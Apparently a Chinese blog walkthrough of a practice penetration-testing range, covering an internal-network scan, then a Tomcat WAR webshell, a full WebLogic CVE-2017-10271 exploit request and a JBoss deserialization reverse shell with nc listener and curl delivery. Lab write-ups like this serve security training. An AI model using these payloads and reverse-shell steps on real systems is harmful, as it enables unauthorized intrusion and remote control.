简单的靶场渗透

2022-01-03

Word count: 1.3k | Reading time≈ 7 min

提示：一共12个flag，有内网。
标准：5个合格
靶场地址：http://1.14.65.168:8077/m/index.php
刚过完年，来玩一玩

[TOC]

获得flag:
1.14.65.168    
        flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}    
flag1 : flag{f784234649d7ef161229349d1d76ba8d}

172.16.20.38tomcat
flag3 ：flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

172.16.20.66
flag5  :flag{b717ca3e4543f05e6970ede833d68ba4}

172.16.20.76
flag4  :flag{22fceae28669c34d139f7ff6db690acb} 

172.16.20.135
flag9  :flag{27e6221a8a55c8ee7396e74531dc7d9d}

信息收集

http://1.14.65.168:8077/data/admin/ver.txt 版本时间20170303

文件上传

http://1.14.65.168:8077/dede/ admin/admin 后台弱口令

后台任意文件上传

哥斯拉连接，看了要提权

html目录下第一个flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7} ，或者robots.txt 直接给的有路径

根目录下第二个flag{f784234649d7ef161229349d1d76ba8d}

本机为172.16.20.66

内网其他主机扫描

发现某位师傅的fscan（shadow1ng/fscan: 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。 (github.com)），正好对内网172.16.20.* 网段存活主机扫描

发现其他5台存活主机

(icmp) Target '172.16.20.38' is alive
(icmp) Target '172.16.20.62' is alive
(icmp) Target '172.16.20.66' is alive
(icmp) Target '172.16.20.76' is alive
(icmp) Target '172.16.20.135' is alive
icmp alive hosts len is: 5
172.16.20.38:8009 open
172.16.20.135:8009 open
172.16.20.66:1080 open
172.16.20.135:8080 open
172.16.20.76:8080 open
172.16.20.38:8080 open
172.16.20.62:7001 open
172.16.20.66:80 open
172.16.20.135:8093 open
172.16.20.135:8083 open
alive ports len is: 10
start vulscan
[*] WebTitle:http://172.16.20.62:7001  code:404 len:1164   title:Error 404--Not Found
[+] InfoScan:http://172.16.20.62:7001  [weblogic] 
[*] WebTitle:http://172.16.20.76:8080  code:302 len:0      title:None
[*] WebTitle:http://172.16.20.135:8083 code:400 len:0      title:None
[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10     title:Login Page
[*] WebTitle:http://172.16.20.38:8080  code:200 len:20     title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.16.20.135:8080 code:200 len:1507   title:Welcome to JBoss&trade;
[*] WebTitle:http://172.16.20.66       code:200 len:12     title:我的网站
[+] InfoScan:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 [Shiro] 
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf
[+] InfoScan:http://172.16.20.135:8080 [Jboss JBOSS] 
[+] http://172.16.20.38:8080/manager/html tomcat tomcat
[+] http://172.16.20.38:8080 poc-yaml-tomcat-manager-week

挂代理

frp 代理出现两个问题，

1，我的frpc竟然不能运行，重新下载了

2，这个报错是frpc.ini里面的注释没有删除

终于代理好了，

下面就一个一个网站看吧

172.16.20.38 tomcat

http://172.16.20.38:8080/manager/html

tomcat tomcat登陆，进入后台

Tomcat 后台部署war木马getshell 哥斯拉生成shel.jsp，jar -cvf sh.war shel.jsp

http://172.16.20.38:8080/sh/shel.jsp

拿到flag3 ：flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

root权限，双网卡发现inet 10.2.5.20/20 brd 10.2.15.255 scope global eth1 另一个网段10.2.5.*

172.16.20.62 weblogic

http://172.16.20.62:7001 fscan扫出来的是weblogic

1
2
3

[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf

能访问http://172.16.20.62:7001/wls-wsat/CoordinatorPortType11说明可能存在cve-2017-10271漏洞

我说咋不能利用exp，原来，burp没有挂代理。。。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 172.16.20.62:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 3282

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/1.jsp</string><void method="println">
                        <string>
<![CDATA[<% out.print("test"); %>]]></string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>



<% out.print("test"); %> 换成对应jsp🐎

http://172.16.20.62:7001/wls-wsat/1.jsp

哥斯拉链接

root用户，无其他网段

flag5 :flag{b717ca3e4543f05e6970ede833d68ba4}

172.16.20.76 Shiro

[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10 title:Login Page

确定为Shiro

用工具https://github.com/j1anFen/shiro_attack/releases

172.16.20.135 JBoss

JBoss Web Console

admin admin 进入

确定版本可以使用CVE-2017-7504 [JBoss 4.x JBossMQ JMS 反序列化漏洞]([（CVE 2017 7504）JBoss 4.x JBossMQ JMS 反序列化漏洞 - Wiki (96.mk)](https://wiki.96.mk/Web安全/Jboss/反序列化漏洞/（CVE-2017-7504）JBoss 4.x JBossMQ JMS 反序列化漏洞/))

sudo git clone https://github.com/ianxtianxt/CVE-2015-7501.git

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.192:4444（IP是攻击机ip,4444是要监听的端口)

nc -lvnp 4444
curl http://172.16.20.135:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

root权限

inet 10.2.5.62/20 brd 10.2.15.255 scope global eth1 发现10.2.5.*网段

干不动了，二层三层内网后续更新，哎实际上就是代理+漏洞复现。

感悟：第一是工具，第二是漏洞不是很敏感